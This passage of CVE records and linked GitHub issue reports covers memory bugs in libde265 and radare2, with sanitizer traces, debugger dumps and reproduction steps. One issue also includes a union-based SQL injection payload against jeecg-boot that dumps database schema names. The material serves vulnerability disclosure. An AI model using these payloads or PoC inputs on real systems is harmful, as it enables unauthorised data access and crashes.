0x61b00000d190 is located 0 bytes to the right of 1552-byte region [0x61b00000cb80,0x61b00000d190)
allocated by thread T0 here:
#0 0x7f929ca5755c in __interceptor_posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:226
#1 0x7f929c78aa61 in ALLOC_ALIGNED(unsigned long, unsigned long) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x181a61)
#2 0x7f929c78b202 in de265_image_get_buffer(void*, de265_image_spec*, de265_image*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x182202)
#3 0x7f929c78d66b in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x18466b)
#4 0x7f929c7709fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa)
#5 0x7f929c749fd4 in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140fd4)
#6 0x7f929c74cee1 in decoder_context::process_reference_picture_set(slice_segment_header*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x143ee1)
#7 0x7f929c75046a in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14746a)
#8 0x7f929c745970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970)
#9 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
#10 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
#11 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
#12 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
#13 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*)
Shadow bytes around the buggy address:
0x0c367fff99e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff99f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fff9a30: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fff9a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fff9a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==733371==ABORTING
```
# POC
[660.zip](https://github.com/strukturag/libde265/files/10253597/660.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase | heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) | https://api.github.com/repos/strukturag/libde265/issues/368/comments | 7 | 2022-12-18T10:37:01Z | 2023-03-06T17:51:27Z | https://github.com/strukturag/libde265/issues/368 | 1,501,854,902 | 368 |
CVE-2022-47665 | 2023-03-03T15:15:10.960 | Libde265 1.0.9 has a heap buffer overflow vulnerability in de265_image::set_SliceAddrRS(int, int, int) | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/369"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.9:*:*:*:*:*:*:*",
"matchCriteriaId": "8186C657-3009-4756-B2AC-531BD7926074",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/369 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int)
# Version info
```
dec265 v1.0.9
--------------
usage: dec265 [options] videofile.bin
The video file must be a raw bitstream, or a stream with NAL units (option -n).
options:
-q, --quiet do not show decoded image
-t, --threads N set number of worker threads (0 - no threading)
-c, --check-hash perform hash check
-n, --nal input is a stream with 4-byte length prefixed NAL units
-f, --frames N set number of frames to process
-o, --output write YUV reconstruction
-d, --dump dump headers
-0, --noaccel do not use any accelerated code (SSE)
-v, --verbose increase verbosity level (up to 3 times)
-L, --no-logging disable logging
-B, --write-bytestream FILENAME write raw bytestream (from NAL input)
-m, --measure YUV compute PSNRs relative to reference YUV
-T, --highest-TID select highest temporal sublayer to decode
--disable-deblocking disable deblocking filter
--disable-sao disable sample-adaptive offset filter
-h, --help show help
```
# Reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
mkdir build
cd build
cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
make -j$(nproc)
./dec265/dec265 653.bin
```
# ASAN
```
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
SPS error: TB > CB
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
=================================================================
==732766==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000007d8 at pc 0x7ff23d2ac50e bp 0x7ffce559d1f0 sp 0x7ffce559d1e0
WRITE of size 2 at 0x6070000007d8 thread T0
#0 0x7ff23d2ac50d in de265_image::set_SliceAddrRS(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1ec50d)
#1 0x7ff23d29fb85 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfb85)
#2 0x7ff23d2a8f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
#3 0x7ff23d2aac3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
#4 0x7ff23d1fde6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
#5 0x7ff23d1fe673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
#6 0x7ff23d1fd311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
#7 0x7ff23d200345 in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140345)
#8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
#9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
#10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#11 0x7ff23cb8ee3f in __libc_start_main_impl ../csu/libc-start.c:392
#12 0x564bf4c027c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
0x6070000007d8 is located 0 bytes to the right of 72-byte region [0x607000000790,0x6070000007d8)
allocated by thread T0 here:
#0 0x7ff23d50d867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x7ff23d2490b4 in MetaDataArray<CTB_info>::alloc(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1890b4)
#2 0x7ff23d245381 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x185381)
#3 0x7ff23d2279fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa)
#4 0x7ff23d206b0d in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x146b0d)
#5 0x7ff23d1fc970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970)
#6 0x7ff23d1ffbe6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
#7 0x7ff23d20024c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
#8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
#9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
#10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
SUMMARY: AddressSanitizer: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int)
Shadow bytes around the buggy address:
0x0c0e7fff80a0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
0x0c0e7fff80b0: 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 00 00
0x0c0e7fff80c0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c0e7fff80d0: 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
0x0c0e7fff80e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa
=>0x0c0e7fff80f0: fa fa 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa
0x0c0e7fff8100: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00
0x0c0e7fff8110: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
0x0c0e7fff8120: 00 00 00 00 04 fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==732766==ABORTING
```
# POC
[653.zip](https://github.com/strukturag/libde265/files/10253589/653.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase
| heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int) | https://api.github.com/repos/strukturag/libde265/issues/369/comments | 5 | 2022-12-18T10:37:03Z | 2023-03-06T17:51:06Z | https://github.com/strukturag/libde265/issues/369 | 1,501,854,985 | 369 |
CVE-2023-24789 | 2023-03-06T16:15:10.187 | jeecg-boot v3.4.4 was discovered to contain an authenticated SQL injection vulnerability via the building block report component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/4511"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg:3.4.4:*:*:*:*:*:*:*",
"matchCriteriaId": "83D5D7DD-38EF-48F6-8C18-F75891A91B66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jeecgboot/jeecg-boot/issues/4511 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | Use the system default account password to log in to the system.
In the visual design menu - report design, see Figure 1 for details.
<img width="1512" alt="截屏2023-01-29 22 01 08" src="https://user-images.githubusercontent.com/32299945/215331278-68f86a40-1199-463a-b0f0-5441746c7eb1.png">
Then click New Report, see Figure 2 for details.
<img width="1512" alt="截屏2023-01-29 22 03 48" src="https://user-images.githubusercontent.com/32299945/215331465-bb6f1bdf-d5c1-4c6a-a952-e34b2fd540ac.png">
Click the + sign to select a new SQL data set, see Figure 3 for details.
<img width="1512" alt="截屏2023-01-29 22 07 51" src="https://user-images.githubusercontent.com/32299945/215331861-a06d00f7-f5d4-4bc8-9335-e4731f1b02a5.png">
Select and enter the corresponding data according to Figure 4, the payload is as follows:
<img width="1512" alt="截屏2023-01-29 22 11 59" src="https://user-images.githubusercontent.com/32299945/215332242-94ca42ab-c4a7-4bd1-994f-1e98a42d0ec8.png">
payload:select * from sys_user WHERE id='' union SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA)
According to the execution result, all the database information of the mysql server of the system can be obtained, see Figure 5 for details.
<img width="1512" alt="截屏2023-01-29 22 14 53" src="https://user-images.githubusercontent.com/32299945/215332357-86bd69da-69d3-4e89-9d17-800c30a4ca53.png">
So far the vulnerability has surfaced successfully. | There is a sql injection vulnerability in the jeecg 3.4.4 building block report | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4511/comments | 3 | 2023-01-29T14:16:41Z | 2023-11-01T01:16:34Z | https://github.com/jeecgboot/JeecgBoot/issues/4511 | 1,561,308,445 | 4,511 |
CVE-2023-27114 | 2023-03-10T02:15:58.403 | radare2 v5.8.3 was discovered to contain a segmentation fault via the component wasm_dis at p/wasm/wasm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": null,
"url": "https://github.com/radareorg/radare2/commit/a15067a8eaa836bcc24b0882712c14d1baa66509"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/radareorg/radare2/issues/21363"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:radare:radare2:5.8.3:*:*:*:*:*:*:*",
"matchCriteriaId": "51E5C30E-2343-42D6-B6FA-C50BCFA549AB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/radareorg/radare2/issues/21363 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"radareorg",
"radare2"
] |
## Description
When parsing the wasm file with r2, using the `pd` command may result in a segmentation fault, because `NULL` was incorrectly passed to `strdup`.
## Environment
```sh
# date
Mon Feb 20 02:38:13 AKST 2023
# r2 -v
radare2 5.8.3 0 @ linux-x86-64 git.5.8.3
commit: 5.8.3 build: 2023-02-16__23:25:48
# uname -ms
Linux x86_64
```
Commit : 39f42922d806d5519dcbb32dd3a6d313d888bfd6
## Proof of concept
[poc.wasm](https://github.com/radareorg/radare2/files/10784008/poc.txt)
## Stack dump
```
pwndbg> r /pwn/poc.wasm
Starting program: /usr/local/bin/r2 /pwn/poc.wasm
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
ERROR: unknown section id: 13
ERROR: unknown section id: 109
-- Check your IO plugins with 'r2 -L'
[0x000000be]> pd
Program received signal SIGSEGV, Segmentation fault.
__strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65
65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory.
pwndbg> context
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────
RAX 0x0
*RBX 0x555555555640 (__libc_csu_init) ◂— endbr64
RCX 0x0
RDX 0x0
RDI 0x0
*RSI 0x555555680729 ◂— 0x1000005555550000
*R8 0x7ffff6df5852 (wasm_decode) ◂— endbr64
*R9 0x1f
*R10 0x555555559010 ◂— 0x6000700070007
*R11 0x7ffff7d95be0 (main_arena+96) —▸ 0x55555582bd80 ◂— 0x0
*R12 0x5555555551c0 (_start) ◂— endbr64
*R13 0x7fffffffe6d0 ◂— 0x2
R14 0x0
R15 0x0
RBP 0x0
*RSP 0x7fffffffcb48 —▸ 0x7ffff7c48383 (strdup+19) ◂— lea r12, [rax + 1]
*RIP 0x7ffff7d316e5 (__strlen_avx2+21) ◂— vpcmpeqb ymm1, ymm0, ymmword ptr [rdi]
──────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────
► 0x7ffff7d316e5 <__strlen_avx2+21> vpcmpeqb ymm1, ymm0, ymmword ptr [rdi]
0x7ffff7d316e9 <__strlen_avx2+25> vpmovmskb eax, ymm1
0x7ffff7d316ed <__strlen_avx2+29> test eax, eax
0x7ffff7d316ef <__strlen_avx2+31> jne __strlen_avx2+272 <__strlen_avx2+272>
↓
0x7ffff7d317e0 <__strlen_avx2+272> tzcnt eax, eax
0x7ffff7d317e4 <__strlen_avx2+276> add rax, rdi
0x7ffff7d317e7 <__strlen_avx2+279> sub rax, rdx
0x7ffff7d317ea <__strlen_avx2+282> vzeroupper
0x7ffff7d317ed <__strlen_avx2+285> ret
0x7ffff7d317ee <__strlen_avx2+286> nop
0x7ffff7d317f0 <__strlen_avx2+288> tzcnt eax, eax
────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffcb48 —▸ 0x7ffff7c48383 (strdup+19) ◂— lea r12, [rax + 1]
01:0008│ 0x7fffffffcb50 —▸ 0x555555680729 ◂— 0x1000005555550000
02:0010│ 0x7fffffffcb58 —▸ 0x7fffffffcca0 —▸ 0x7fffffffcd00 —▸ 0x7fffffffcd40 —▸ 0x7fffffffcda0 ◂— ...
03:0018│ 0x7fffffffcb60 —▸ 0x5555555551c0 (_start) ◂— endbr64
04:0020│ 0x7fffffffcb68 —▸ 0x7ffff6df4574 (wasm_dis+4394) ◂— mov rdx, rax
05:0028│ 0x7fffffffcb70 ◂— 0x0
06:0030│ 0x7fffffffcb78 —▸ 0x7ffff7d95b80 (main_arena) ◂— 0x0
07:0038│ 0x7fffffffcb80 —▸ 0x555555782140 ◂— ' dd '
──────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────
► f 0 0x7ffff7d316e5 __strlen_avx2+21
f 1 0x7ffff7c48383 strdup+19
f 2 0x7ffff6df4574 wasm_dis+4394
f 3 0x7ffff6df5906 wasm_decode+180
f 4 0x7ffff6da22dd r_arch_decode+136
f 5 0x7ffff64ed2e1 r_anal_op+580
f 6 0x7ffff7827c22 r_core_print_disasm+2478
f 7 0x7ffff7772b54 cmd_print+15553
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65
#1 0x00007ffff7c48383 in __GI___strdup (s=0x0) at strdup.c:41
#2 0x00007ffff6df4574 in wasm_dis (op=0x7fffffffcce0, buf=0x555555680630 "\375\240\001\375d\v", buf_len=249, txt=true) at p/wasm/wasm.c:1112
#3 0x00007ffff6df5906 in wasm_decode (s=0x555555677b10, op=0x555555781c10, mask=R_ARCH_OP_MASK_ALL) at p/wasm/plugin.c:366
#4 0x00007ffff6da22dd in r_arch_decode (a=0x55555559a320, op=0x555555781c10, mask=31) at arch.c:225
#5 0x00007ffff64ed2e1 in r_anal_op (anal=0x55555559c910, op=0x555555781c10, addr=197, data=0x555555559937 "\375\240\001\375d\v", len=249, mask=R_ARCH_OP_MASK_ALL) at op.c:113
#6 0x00007ffff7827c22 in r_core_print_disasm (core=0x7ffff5dea010, addr=190, buf=0x555555559930 "A\205\376\377w\375\017\375\240\001\375d\v", len=256, count=64, pdu_condition_type=pdu_instruction, pdu_condition=0x0, count_bytes=false, json=false, pj=0x0, pdf=0x0) at disasm.c:5727
#7 0x00007ffff7772b54 in cmd_print (data=0x7ffff5dea010, input=0x55555574ff61 "d") at cmd_print.c:6708
#8 0x00007ffff77ef9dc in r_cmd_call (cmd=0x5555555e6ff0, input=0x55555574ff60 "pd") at cmd_api.c:520
#9 0x00007ffff778ca90 in r_core_cmd_subst_i (core=0x7ffff5dea010, cmd=0x55555574ff60 "pd", colon=0x0, tmpseek=0x7fffffffe114) at cmd.c:4930
#10 0x00007ffff77882cb in r_core_cmd_subst (core=0x7ffff5dea010, cmd=0x55555574ff60 "pd") at cmd.c:3760
#11 0x00007ffff778fcd2 in run_cmd_depth (core=0x7ffff5dea010, cmd=0x55555574ef30 "pd") at cmd.c:5829
#12 0x00007ffff779017b in r_core_cmd (core=0x7ffff5dea010, cstr=0x55555574eef0 "pd", log=true) at cmd.c:5913
#13 0x00007ffff76ab199 in r_core_prompt_exec (r=0x7ffff5dea010) at core.c:3556
#14 0x00007ffff76aa6ea in r_core_prompt_loop (r=0x7ffff5dea010) at core.c:3374
#15 0x00007ffff7dc7c9f in r_main_radare2 (argc=2, argv=0x7fffffffe6d8) at radare2.c:1700
#16 0x0000555555555638 in main (argc=2, argv=0x7fffffffe6d8) at radare2.c:104
#17 0x00007ffff7bcd083 in __libc_start_main (main=0x5555555555e0 <main>, argc=2, argv=0x7fffffffe6d8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe6c8) at ../csu/libc-start.c:308
#18 0x00005555555551ee in _start ()
```
## Credit
Q1IQ(@Q1IQ) | Segmentation fault in wasm_dis at p/wasm/wasm.c:1112 | https://api.github.com/repos/radareorg/radare2/issues/21363/comments | 1 | 2023-02-20T11:48:06Z | 2023-02-20T12:30:07Z | https://github.com/radareorg/radare2/issues/21363 | 1,591,704,755 | 21,363 |
CVE-2023-27102 | 2023-03-15T15:15:09.617 | Libde265 v1.0.11 was discovered to contain a segmentation violation via the function decoder_context::process_slice_segment_header at decctx.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/strukturag/libde265/issues/393"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.11:*:*:*:*:*:*:*",
"matchCriteriaId": "75BAF096-8BC3-4430-930C-8F3E6266C21D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/393 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"strukturag",
"libde265"
] | ### Desctiption
A SEGV has occurred when running program dec265
NULL Pointer Dereference in function decoder_context::process_slice_segment_header at decctx.cc:2007:20
### Version
```
dec265 v1.0.11
git log
commit fef32a7761993702c699dfbe3699e44374eb44b5 (HEAD -> master, origin/master, origin/HEAD)
Merge: 3aea5a45 c2b60f1c
Author: Dirk Farin <[email protected]>
Date: Thu Feb 9 11:13:24 2023 +0100
```
### Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
cd dec265
./dec265 SEGV-POC
```
```
WARNING: non-existing PPS referenced
WARNING: maximum number of reference pictures exceeded
WARNING: maximum number of reference pictures exceeded
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3838968==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004e2220 bp 0x7ffc6cbf5fd0 sp 0x7ffc6cbf5ac0 T0)
==3838968==The signal is caused by a READ memory access.
==3838968==Hint: address points to the zero page.
#0 0x4e2220 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:2007:20
#1 0x4e1012 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:649:7
#2 0x4eb7f1 in decoder_context::decode_NAL(NAL_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1240:11
